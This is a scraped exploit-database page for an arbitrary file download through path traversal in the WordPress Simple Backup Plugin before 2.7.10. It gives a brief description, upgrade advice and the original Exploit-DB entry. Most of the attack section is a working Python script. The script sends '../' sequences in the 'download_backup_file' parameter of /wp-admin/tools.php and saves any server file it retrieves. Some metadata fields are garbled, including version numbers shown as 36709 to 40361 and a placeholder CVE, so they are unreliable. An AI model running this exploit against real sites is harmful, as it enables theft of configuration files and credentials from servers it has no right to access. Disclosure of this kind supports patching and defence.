Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Arbitrary File Download via Path Traversal in Simple Backup Plugin < 2.7.10 - exploit.company
header-logo
Suggest Exploit
vendor:
Simple Backup Plugin
by:
Ven3xy
6.1
CVSS
HIGH
Arbitrary File Download
22
CWE
Product Name: Simple Backup Plugin
Affected Version From: 36709
Affected Version To: 40361
Patch Exists: YES
Related CWE: CVE-2024-XXXX (Not provided in the text)
CPE: a:simple_backup_plugin:2.7.10
Metasploit:
Other Scripts: https://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/smb/ms17_010_eternalbluehttps://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/scanner/smb/smb_enumshareshttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/webapp/drupal_restws_unserializehttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/webapp/drupal_drupalgeddon2https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/webapp/thinkphp_rcehttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/local/nscp_pehttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684https://www.infosecmatter.com/top-25-penetration-testing-skills-and-competencies-detailed/https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/gather/cloud_lookup
Platforms Tested: Linux
2024

Arbitrary File Download via Path Traversal in Simple Backup Plugin < 2.7.10

The Simple Backup Plugin version 2.7.10 allows an attacker to download arbitrary files from the server through a path traversal vulnerability. By manipulating the 'download_backup_file' parameter in the 'tools.php' page, an attacker can traverse directories and access sensitive files on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update Simple Backup Plugin to version 2.7.11 or later. Additionally, input validation should be implemented to prevent path traversal attacks.
Source

Exploit-DB raw data:

# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal
# Date: 2024-03-06
# Exploit Author: Ven3xy
# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.10
# Tested on: Linux

import sys
import requests
from urllib.parse import urljoin
import time

def exploit(target_url, file_name, depth):
    traversal = '../' * depth

    exploit_url = urljoin(target_url, '/wp-admin/tools.php')
    params = {
        'page': 'backup_manager',
        'download_backup_file': f'{traversal}{file_name}'
    }

    response = requests.get(exploit_url, params=params)

    if response.status_code == 200 and response.headers.get('Content-Disposition') \
            and 'attachment; filename' in response.headers['Content-Disposition'] \
            and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:
        print(response.text)  # Replace with the desired action for the downloaded content

        file_path = f'simplebackup_{file_name}'
        with open(file_path, 'wb') as file:
            file.write(response.content)

        print(f'File saved in: {file_path}')
    else:
        print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python exploit.py <target_url> <file_name> <depth>")
        sys.exit(1)

    target_url = sys.argv[1]
    file_name = sys.argv[2]
    depth = int(sys.argv[3])
    print("\n[+] Exploit Coded By - Venexy    ||    Simple Backup Plugin 2.7.10  EXPLOIT\n\n")
    time.sleep(5)


    exploit(target_url, file_name, depth)

Navigation

Suggest Exploit

Services By CQR